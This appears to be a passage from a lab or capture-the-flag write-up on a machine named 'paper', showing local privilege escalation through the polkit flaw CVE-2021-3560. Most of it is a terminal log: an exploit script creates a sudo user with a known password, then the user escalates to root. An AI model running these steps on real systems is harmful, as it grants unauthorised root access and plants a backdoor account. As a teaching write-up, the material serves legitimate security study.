CVE-2021-3560
PEAS initially discovered that the target system is vulnerable to CVE-2021-4034, but the exploit failed with an error message that the binary doesn’t have the SUID bit set as root. This was rather interesting as the target system had polkit running in the background.
Later, PEAS also found that the target system is vulnerable to CVE-2021-3560
a vulnerability was found in polkit (affected version not known). It has been rated as critical. Affected by this issue is an unknown code of the component D-Bus Request Handler. The manipulation with an unknown input leads to a authorization vulnerability. Using CWE to declare the problem leads to CWE-863. The software performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check. This allows attackers to bypass intended access restrictions. Impacted is confidentiality, integrity, and availability.
Exploit
I found an exploit online
Exploitation
[dwight@paper shm]$ python3 CVE-2021-3560.py
_ __,~~~/_ __ ___ _______________ ___ ___
,~~`( )_( )-\| / / / / |/ / _/ ___/ __ \/ _ \/ _ \
|/| `--. Y / /_/ / // // /__/ /_/ / , _/ // /
_V__v___!_!__!_______|__\____/_/|_/___/\___/\____/_/|_/____/....
unicord: Exploit for CVE-2021-3560 (Polkit) - Local Privilege Escalation
username: unicord
password: unicord
depends: Dependencies for exploit are met!
exploit: New user created!
prepare: New password hash generated!
exploit: Password configured for new user!
success: Created Sudo user "unicord" with password "unicord"!It appears that the exploit script successfully created a sudo user; unicord
[dwight@paper shm]$ su unicord
password: unicord
[unicord@paper shm]$
[unicord@paper shm]$ whoami
unicordSwitching to the newly created sudo user; unicord
[unicord@paper shm]$ sudo su root
We trust you have received the usual lecture from the local System
administrator. it usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for unicord: unicord
[root@paper shm]# id
uid=0(root) gid=0(root) groups=0(root)
[root@paper shm]# whoami
root
[root@paper shm]# hostname
paper
[root@paper shm]# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.143 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 fe80::250:56ff:feb9:45da prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:45da prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:45:da txqueuelen 1000 (Ethernet)
RX packets 11435640 bytes 1046215475 (997.7 MiB)
RX errors 0 dropped 119 overruns 0 frame 0
TX packets 12514581 bytes 26963689605 (25.1 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 351169 bytes 92153808 (87.8 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 351169 bytes 92153808 (87.8 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
virbr0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 192.168.122.1 netmask 255.255.255.0 broadcast 192.168.122.255
ether 52:54:00:9b:e7:f7 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0System Level Compromise